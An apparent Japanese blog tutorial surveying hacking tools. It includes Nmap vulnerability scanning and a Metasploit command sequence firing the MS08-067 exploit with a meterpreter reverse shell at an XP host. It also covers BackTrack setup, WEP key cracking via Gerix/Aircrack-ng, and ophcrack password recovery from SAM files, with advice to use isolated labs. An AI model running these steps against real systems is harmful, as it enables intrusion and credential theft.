Network Tool まとめ

Extinct card set今回は、私がおすすめするNetwork Tool、いわゆるHacking Tookをまとめてみようと思います。
photo credit: _Untitled-1


Nmap

nmapとは、ネットワークスキャナのことです。様々な脆弱性をスキャンするスクリプトも数多く公開されています。

$ nmap -sT 192.168.0.3

スクリプトは、`Lua`で書かれています。ダウロードしたものをnmap/scriptsに保存し、データベースを再起動すると使えるようになります。

wget http://nmap.org/svn/scripts/smb-check-vulns.nse

find / -name nmap

mv smb-check-vulns.nse /usr/local/share/nmap/scripts

nmap --script-updatedb

nmap --script=smb-check-vulns 192.168.0.3


Metasploit

Metasploitとは、セキュリティにおける定番ツールのことです。基本的には、脆弱性スキャナと攻撃ツールとなっておりますが、拡張することで、総合的な脆弱性テストが可能です。

では、なぜこのようなツールを紹介するのかというと、私は、パソコンのセキュリティは重要であると考えています。そして、セキュリティを学ぶには、まずはハッキングから学ぶことが効率的だと考えています。つまり、攻撃者の立場になってものを考えるわけです。ということで、ここでは、`metasploit`の基本的な使い方を紹介したいと思います。

sudo port install metasploit3

brew install metasploit

sudo port uninstall metasploit3

msfconsole

msfupdate


metasploitを実行するときは、ローカルネットワークに仮想環境を構築し、それを対象にしましょう。ここでは、VirtualBoxを使用。

metasploitの使い方を学ぶには、常に最新のセキュリティ情報をチェックし、危険な脆弱性については、仮想環境にて実行してみることをおすすめします。

#一気にsessionを確立できるためパフォーマンスによく使われるxpの特定バージョンの脆弱性の検索
> search ms08_067_netapi

#攻撃ツールのロード
> use windows/smb/ms08_067_netapi

#ペイロードの設定
> set PAYLOAD windows/meterpreter/reverss_tcp

#攻撃対象の設定
> set RHOST 192.168.0.3

#使用するポートの設定
> set LPORT 8080

#攻撃の開始
> exploit -j


なお、ここでは、投稿の体裁上、Mainの`Mac`で攻撃を実行していますが、攻撃する側、攻撃される側どちらも仮想環境に構築し、外部からアクセス出来ないように設定しておくのが一番かとおもいます。その場合、攻撃する側は、BackTrackを使用するのがいいかと思います。

BackTrack

BackTrack5とは、`Ubuntu`をベースに作られた`Hacking Tool`をつめあわせたOSのことです。アプリも必要最低限しか入っておらず、かつブラウザの設定において一定のセキュリティが施されていることから、初期からある程度のセキュリティが考えられています。



ここでは、BackTrack5初期設定を説明していきたいと思います。

apt-get update && apt-get install software-center


#日本語版の`BackTrack`も出回っているようですが、一応紹介しておきます。
#ソフトウェアセンターで検索
Language Support


apt-get install vim

vim ~/.bash_profile

#以下を追記します。
###ここから###
#!/bin/sh
if [[ ! $DISPLAY && $(tty) = /dev/tty1 ]]; then
exec startx
fi
###ここまで###


prepare-kernel-sources

cd /usr/src/linux

cp -rf include/generated/* include/linux/

update-rc.d wicd defaults


sudo apt-get install xdg-user-dirs-gtk

LANG=C xdg-user-dirs-gtk-update


Gerix wifi cracker

Gerix wifi cracker とは、GUI で Aircrack-ng を操作するソフトです。Aircrack-ng はコマンドも多く、GUI で操作する方が効率的です。

1. BT4(Backtrack4 RC2)の場合、K-Menu から Backtrack > Radio Network Analysis > 80211 > Cracking > Gerix wifi cracker を選択。

2. Configuration の画面にて wlan0 を選択し、「Enadle/Disable Monitor Mode」をクリック。すると、モニターモードが起動します。すると、mon0 (Monitor) ができます。



3. mon0 を選択し、「Rescan networks」をクリック。すると、モニターモードを使った AP 情報の収集が行われます。



4. ここで、WEP が使われている AP を選択し、タブ「WEP」を選択し、「Start Sniffing and Logging」をクリック。すると、選択した AP のパケットが収集されます。WEP の解析は、5万パケットほどパケットを収集する必要があります。ここで、AP からパケットを吐かせるツールを使用すると効率的にパケットを収集できます。

5. パケットが集まったらタブ「Cracking」 > 「Aircrack-ng Decypt WEP password」をクリックすると、WEPの解析が始まり、解析が成功すれば、WEP Key が表示されます。

パケットの収集、WEP 解析そのものは違法ではないと考えますが、解析した結果を用いることは違法となる可能性があります。したがって、自分が管理するAP以外にはこれらのツールは使わないでください。

ophcrack

ophcrack とは、XPやVistaのパスワードを瞬時に解析してしまうアプリです。手軽に使えるため、パスワードクラックとしては定番ツールです。

sudo apt-get update && sudo apt-get -y install ophcrack && ophcrack


先ほどダウンロードし、解凍したテーブル"Table"を選択します。そして、Load > SAM にてWindows/System32/config/RegBackをロードします。最後に"Crack"を選択します。すると、自動でパスワードの解析が始まります。



解析が終わったら、USBの保存領域に"Save"すると、便利になります。これで、パスワード解析ソフトが入った Live USB の完成です。あとは、自分なりにカスタマイズすると使いやすくなります。